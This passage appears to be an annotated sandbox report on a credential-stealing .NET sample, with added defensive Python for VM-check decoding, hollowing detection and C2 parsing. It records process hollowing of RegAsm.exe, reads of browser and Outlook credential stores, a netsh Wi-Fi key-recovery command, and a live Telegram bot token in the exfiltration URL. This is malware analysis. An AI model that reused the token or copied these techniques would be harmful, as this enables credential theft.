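memory dump (added example; not code from the report or from the sample).

In the dump the VMware/VirtualBox paths sit back to back with one odd
printable character between them ('"', 'L', "'", '%', '&', ')').  Each of
those bytes equals the length of the string that follows, for example
0x22 == 34 == len("SOFTWARE\\VMware, Inc.\\VMware Tools").  That is the
layout .NET's BinaryWriter.Write(string) produces: a 7-bit encoded byte
length, then UTF-8 text.  The prefix of the first string in each run is
not printable, so the string extractor dropped it; the blobs below put it
back (0x06 for "VMWARE", 0x0b for "InstallPath", 0x10 for
"noValueButYesKey"); every other byte is verbatim from the report.
"""


def read_7bit_int(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode a .NET 7-bit encoded integer at buf[pos] -> (value, next_pos).

    The low 7 bits of each byte carry data; the high bit means "more follows".
    """
    value = shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated length prefix")
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 35:  # more than 5 bytes is invalid, as in BinaryReader
            raise ValueError("length prefix too long")


def unpack_strings(buf: bytes) -> list[str]:
    """Split a run of length-prefixed UTF-8 strings.

    A truncated tail (dump cut mid-string) ends the run instead of yielding
    a partial string, so every returned entry is complete.
    """
    out: list[str] = []
    pos = 0
    while pos < len(buf):
        try:
            length, start = read_7bit_int(buf, pos)
        except ValueError:
            break
        end = start + length
        if end > len(buf):
            break
        out.append(buf[start:end].decode("utf-8"))
        pos = end
    return out


def pack_strings(strings: list[str]) -> bytes:
    """Inverse of unpack_strings; lengths >= 128 get a multi-byte prefix."""
    out = bytearray()
    for s in strings:
        data = s.encode("utf-8")
        n = len(data)
        while n >= 0x80:
            out.append((n & 0x7F) | 0x80)
            n >>= 7
        out.append(n)
        out += data
    return bytes(out)


# Constructed from the report's "Binary or memory string" lines (see above).
RUN_REGISTRY = (
    b"\x06VMWARE"
    b'"SOFTWARE\\VMware, Inc.\\VMware Tools'
    b"LHARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
    b"LHARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
    b"'SYSTEM\\ControlSet001\\Services\\Disk\\Enum"
)
RUN_VMWARE_FILES = (
    b"\x0bInstallPath"
    b"%C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\"
    b"'C:\\WINDOWS\\system32\\drivers\\vmmouse.sys"
    b"&C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys"
)
RUN_VBOX_FILES = b"\x10noValueButYesKey" b")C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys"


def vm_check_list() -> list[str]:
    """Every artefact the three packed runs name, in dump order."""
    return [s for run in (RUN_REGISTRY, RUN_VMWARE_FILES, RUN_VBOX_FILES) for s in unpack_strings(run)]


if __name__ == "__main__":
    for item in vm_check_list():
        print(item)
```

Running it prints the eleven artefacts the runs name: the registry keys (VMware Tools, the two SCSI DEVICEMAP paths, Disk\Enum) and the driver and install paths for VMware and VirtualBox. The truncation rule matters on memory dumps, which routinely cut a run mid-string.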

HIPS / PFW / Operating System Protection Evasion

Decompiled .NET code (the report elides the source file name as -------.cs; the identifiers are the obfuscator's):

Source: project plan.exe, -------.cs | Reference to suspicious API methods: GetProcAddress(_08EA_08E2_EE64_061A_EED3_EEFF, _0618_08D2_08F2_EE97_EE3A_EE20_EEBB_ECB4_064E_EE6B_EE7F_EE03_EEDF_060F)
Source: project plan.exe, -------.cs | Reference to suspicious API methods: VirtualProtect(procAddress, (uint)_0E74_06DC_066D_EE6C_0EBB_EE37_EE1D_EE5B_08FF_08E8_06FD_EEF9.Length, 64u, out var _EE1B_0EB9_EE85_EEF8_0E68_06DC_061E_EE14_EE69_EED8_0EB6_EE43_EE2E_EEA0_0E7F_EE71)
Source: project plan.exe, -------.cs | Reference to suspicious API methods: LoadLibrary(_EEF9_08FE_ECA9_EEE9(_0602_EC97_06D8_EE8E_EE96_ECA5_EEBD_EE09_EEE3_EE39._ECB1_ECB7_066B_EE9D_EE63_ECAC_06DC_06EB))

The trio resolves an export with LoadLibrary and GetProcAddress, then makes the first bytes of that function writable and executable (64 is PAGE_EXECUTE_READWRITE) for the length of a byte array: the shape of an in-memory patch of a system function. The report does not show which function is patched or with what bytes.

Process hollowing of RegAsm.exe:

Source: C:\Users\user\Desktop\project plan.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 424000
Source: C:\Users\user\Desktop\project plan.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AFF008
Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\project plan.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Read together: an executable allocation at 0x400000 (the usual preferred image base of a 32-bit .NET executable), an MZ header written there, section-sized writes at 0x402000, 0x422000 and 0x424000, and a single write far outside the image at 0xAFF008. That last address is 8 bytes past a page boundary, which is the offset of ImageBaseAddress in a 32-bit PEB, the field a hollowing loader updates after mapping its image; the report itself only records the address. RegAsm.exe is launched with no arguments; run that way it only prints its usage and exits, so a bare launch of it from an executable on the desktop is itself a strong signal.

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile

Volume-information queries (the .NET loader performs these for every assembly it loads; listed for completeness, the assembly names show what the payload pulls in: Windows Forms, Microsoft.VisualBasic, System.Web.Extensions, System.Drawing, Accessibility):

Source: C:\Users\user\Desktop\project plan.exe | Queries volume information: C:\Users\user\Desktop\project plan.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\project plan.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

MachineGuid is a stable per-installation value; stealers commonly read it as a victim identifier.
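The injection lines above are individually weak (any debugger writes foreign memory) but together they are a complete process-hollowing sequence. The following added example, not Joe Sandbox code, correlates events of that shape into one finding. EVENTS is constructed from the report's lines for project plan.exe and RegAsm.exe with the report's addresses; IMAGE_WINDOW is an assumption, because the report does not state the size of the written image, so writes within 1 MiB above the MZ header are treated as section writes and anything else as out-of-image.

```python
"""Turn per-event injection evidence into a process-hollowing finding
(added example; not Joe Sandbox code).

EVENTS mirrors the report's "Process created", "Memory allocated" and
"Memory written" lines for project plan.exe -> RegAsm.exe.  IMAGE_WINDOW
is an assumption: the report does not give the image size, so writes
within 1 MiB of the MZ header count as section writes.
"""
from collections import defaultdict

EVENTS = [
    {"op": "process_created", "src": "project plan.exe", "target": "RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"'},
    {"op": "memory_allocated", "src": "project plan.exe", "target": "RegAsm.exe",
     "base": 0x400000, "protect": "page execute and read and write"},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe",
     "base": 0x400000, "starts_with": "4D5A"},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe", "base": 0x400000},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe", "base": 0x402000},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe", "base": 0x422000},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe", "base": 0x424000},
    {"op": "memory_written", "src": "project plan.exe", "target": "RegAsm.exe", "base": 0xAFF008},
]

IMAGE_WINDOW = 0x100000

# .NET framework utilities that print usage and exit when run without an
# argument; a bare launch of one is only useful as a hollowing host.
ARGLESS_DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}


def bare_launch(cmdline: str) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    c = cmdline.strip()
    if c.startswith('"'):
        close = c.find('"', 1)
        return close != -1 and c[close + 1:].strip() == ""
    return len(c.split()) == 1


def find_hollowing(events, image_window=IMAGE_WINDOW):
    """One finding per (injector, target) pair that allocated executable
    memory in the target and then wrote a PE header (MZ, 4D5A) into it."""
    pairs = defaultdict(lambda: {"cmdline": None, "exec_allocs": set(), "writes": []})
    for e in events:
        rec = pairs[(e["src"], e["target"])]
        if e["op"] == "process_created":
            rec["cmdline"] = e.get("cmdline", "")
        elif e["op"] == "memory_allocated" and "execute" in e.get("protect", ""):
            rec["exec_allocs"].add(e["base"])
        elif e["op"] == "memory_written":
            rec["writes"].append(e)

    findings = []
    for (src, target), rec in pairs.items():
        mz = {w["base"] for w in rec["writes"]
              if w.get("starts_with", "").upper() == "4D5A" and w["base"] in rec["exec_allocs"]}
        if not mz:
            continue
        image = min(mz)

        def in_image(addr):
            return image <= addr < image + image_window

        bases = {w["base"] for w in rec["writes"]}
        findings.append({
            "technique": "process hollowing (T1055.012)",
            "injector": src,
            "target": target,
            "image_base": image,
            "section_writes": sorted(a for a in bases if in_image(a)),
            "writes_outside_image": sorted(a for a in bases if not in_image(a)),
            "bare_lolbin_launch": (rec["cmdline"] is not None
                                   and target.lower() in ARGLESS_DOTNET_HOSTS
                                   and bare_launch(rec["cmdline"])),
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowing(EVENTS):
        print(f"{f['injector']} -> {f['target']}: {f['technique']}, image at {f['image_base']:#x}, "
              f"section writes {[hex(a) for a in f['section_writes']]}, "
              f"out-of-image writes {[hex(a) for a in f['writes_outside_image']]}, "
              f"bare LOLBin launch={f['bare_lolbin_launch']}")
```

The rule deliberately requires both halves: an executable allocation in a foreign process and an MZ header written into that same allocation. Dropping either one (the last assertion in the test removes the allocation) produces no finding, which keeps debuggers and crash reporters, which write foreign memory without mapping an image, out of the results.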

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile

The netsh launch is what triggers the "modifies network and firewall settings" signature, but the recorded command only lists the saved Wi-Fi profiles and changes no setting. Recovering a key takes a per-profile "netsh wlan show profile name=<SSID> key=clear", which this run did not capture.

Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

These Defender paths come from the analysis machine's Amcache hive, not from the sample's memory: they show that Defender was installed on the sandbox, not that the sample enumerates or terminates antivirus processes.

Stealing of Sensitive Information

Yara match set 1:
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

Yara match set 2:
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

Credential store access by the hollowed RegAsm.exe:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

"Login Data" is the Chromium SQLite database holding saved logins (Chrome and Edge here); the Outlook subkey 9375CFF0413111d3B88A00104B2A6676 is where Outlook profiles store account settings, including the encrypted account passwords. The only process that should open these is the owning browser or mail client, so a read by RegAsm.exe is a clean detection on its own.

Yara match set 3:
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

Remote Access Functionality

Yara match set 1 (the same thirteen sources as set 1 under Stealing of Sensitive Information):
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR

Yara match set 2 (the same ten sources as set 2 under Stealing of Sensitive Information):
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques with signature matches, by tactic. The leading digits are the report's signature-count badges, which extraction ran together: "311" is three badges (3, 1 and 1), not 311 signatures.

Execution: 1 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading
Defense Evasion: 2 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping
Discovery: 121 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery
Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol

Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration and Impact: no matched techniques. The remaining cells of the matrix (for example Valid Accounts, Scheduled Task/Job, LSASS Memory, Wi-Fi Discovery, Remote Services, Input Capture, Keylogging, Exfiltration Over Other Network Medium, Data Encrypted for Impact) are the tactic's placeholder techniques and carry no badge.
Behavior Graph (ID 1466687; sample: project plan.exe; start date: 03/07/2024; architecture: WINDOWS; score: 100)

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Capture Wi-Fi password; 8 other signatures.
Names resolved during the run: api.telegram.org (Uses the Telegram API, likely for C&C communication), checkip.dyndns.org, checkip.dyndns.com.

Process tree:
project plan.exe (started)
    signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    -> RegAsm.exe (started; host of the injected payload)
        network: api.telegram.org 149.154.167.220 port 443 from local port 49711 (TELEGRAMRU, United Kingdom); checkip.dyndns.com 132.226.247.73 port 80 from local port 49704 (UTMEMUS, United States)
        signatures: Tries to steal Mail credentials (via file / registry access); Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
        -> netsh.exe (started)
            -> conhost.exe (started)
    -> WerFault.exe (started; Windows Error Reporting, which points to a crash in the parent) dropped file: C:\ProgramData\Microsoft\...\Report.wer, Unicode
    -> conhost.exe (started)
    -> RegAsm.exe (started; second instance, with no network or signature edges in the graph)

Antivirus and reputation lookups

Sample:
project plan.exe: 100% (Joe Sandbox ML)
Remaining scanned artefacts: no antivirus matches

Domains (Virustotal):
api.telegram.org: 2%
checkip.dyndns.com: 0%
checkip.dyndns.org: 1%

URLs:
http://upx.sf.net: URL Reputation: safe (listed twice)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: URL Reputation: safe
http://checkip.dyndns.org/: Avira URL Cloud: safe; Virustotal: 1%
http://checkip.dyndns.org: Avira URL Cloud: safe; Virustotal: 1%
http://checkip.dyndns.org/q: Avira URL Cloud: safe; Virustotal: 0%
http://checkip.dyndns.com: Avira URL Cloud: safe; Virustotal: 0%
https://api.telegram.org: Avira URL Cloud: safe; Virustotal: 1%
http://api.telegram.org: Avira URL Cloud: safe; Virustotal: 2%
https://api.telegram.org/bot: Avira URL Cloud: safe; Virustotal: 1%
https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake: Avira URL Cloud: safe
https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361 (string cut short in memory): Avira URL Cloud: safe; Virustotal: 2%

The "safe" verdicts reflect the hosting services, which are legitimate: the Telegram Bot API is abused here as the exfiltration channel and checkip.dyndns.org is an IP-echo service the sample uses to learn the victim's public address. The indicator to act on is the bot token and chat_id in the full sendDocument URL, not the domains.
Domains (name; IP; active; malicious; antivirus detection; reputation):
api.telegram.org; 149.154.167.220; active: true; malicious: true; antivirus detection: none; reputation: unknown
checkip.dyndns.com; 132.226.247.73; active: true; malicious: false; antivirus detection: none; reputation: unknown
checkip.dyndns.org; IP unknown; active: unknown; malicious: true; antivirus detection: none; reputation: unknown
URLs contacted (name; malicious; antivirus detection; reputation):
https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake; malicious: false; Avira URL Cloud: safe; reputation: unknown
http://checkip.dyndns.org/; malicious: false; Virustotal: 1%; Avira URL Cloud: safe; reputation: unknown

URLs found in memory (name; source; malicious; antivirus detection; reputation):
http://upx.sf.net; Amcache.hve.7.dr; malicious: false; URL Reputation: safe (listed twice); reputation: unknown
http://checkip.dyndns.org; RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002D29000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Virustotal: 1%; Avira URL Cloud: safe; reputation: unknown
http://checkip.dyndns.com; RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Virustotal: 0%; Avira URL Cloud: safe; reputation: unknown
https://api.telegram.org; RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp; malicious: true; Virustotal: 1%; Avira URL Cloud: safe; reputation: unknown
https://api.telegram.org/bot; project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp; malicious: true; Virustotal: 1%; Avira URL Cloud: safe; reputation: unknown
http://api.telegram.org; RegAsm.exe, 00000003.00000002.3221467298.0000000002E57000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Virustotal: 2%; Avira URL Cloud: safe; reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp; malicious: false; URL Reputation: safe; reputation: unknown
http://checkip.dyndns.org/q; project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp; malicious: false; Virustotal: 0%; Avira URL Cloud: safe; reputation: unknown
https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361 (string cut short in memory); RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp; malicious: false; Virustotal: 2%; Avira URL Cloud: safe; reputation: unknown

Two of these sources matter for attribution: "https://api.telegram.org/bot" and "http://checkip.dyndns.org/q" occur both in the project plan.exe heap and in the image mapped at 0x402000 inside RegAsm.exe, so they belong to the injected payload's own string table rather than to the loader. The upx.sf.net string comes from the Amcache hive, not from the sample, and says nothing about how the sample is packed.
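The sendDocument URL above carries the whole C2 configuration (bot token, chat_id, caption template), and the multipart boundary from the RegAsm.exe memory strings carries a clock value. The following added example, not Joe Sandbox or Snake Keylogger code, extracts both. C2_URL and BOUNDARY are copied from this report; decoding the boundary as a dash run followed by DateTime.Now.Ticks in hex (100 ns units since 0001-01-01 on the local clock) is an inference from its shape, based on the widely copied C# multipart-upload idiom, not something the report states.

```python
"""Extract the Telegram C2 parameters from the report's sendDocument URL
and date the upload from the multipart boundary seen in RegAsm.exe memory
(added example; not Joe Sandbox or Snake Keylogger code).

C2_URL and BOUNDARY are copied from the report.  Reading the boundary as
"dashes + DateTime.Now.Ticks in hex" is an inference from its shape.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

C2_URL = ("https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument"
          "?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker"
          "%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake")
BOUNDARY = "------------------------8dc9b102694a6ea"

# Bot API path: /bot<numeric id>:<secret>/<method>
TOKEN_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
DOTNET_EPOCH = datetime(1, 1, 1)


def parse_telegram_c2(url: str):
    """Bot id, full token, API method, chat_id and decoded caption, or None
    when the URL is not a Telegram Bot API call."""
    parts = urlsplit(url)
    m = TOKEN_RE.match(parts.path)
    if parts.hostname != "api.telegram.org" or m is None:
        return None
    query = parse_qs(parts.query)  # percent-decodes, so %0D%0A becomes CR LF
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "caption": query.get("caption", [""])[0],
    }


def ticks_to_datetime(ticks: int) -> datetime:
    """.NET DateTime.Ticks (100 ns intervals since 0001-01-01) -> naive datetime."""
    return DOTNET_EPOCH + timedelta(microseconds=ticks // 10)


def boundary_timestamp(boundary: str):
    """Recover the clock value baked into a 'dashes + hex ticks' boundary,
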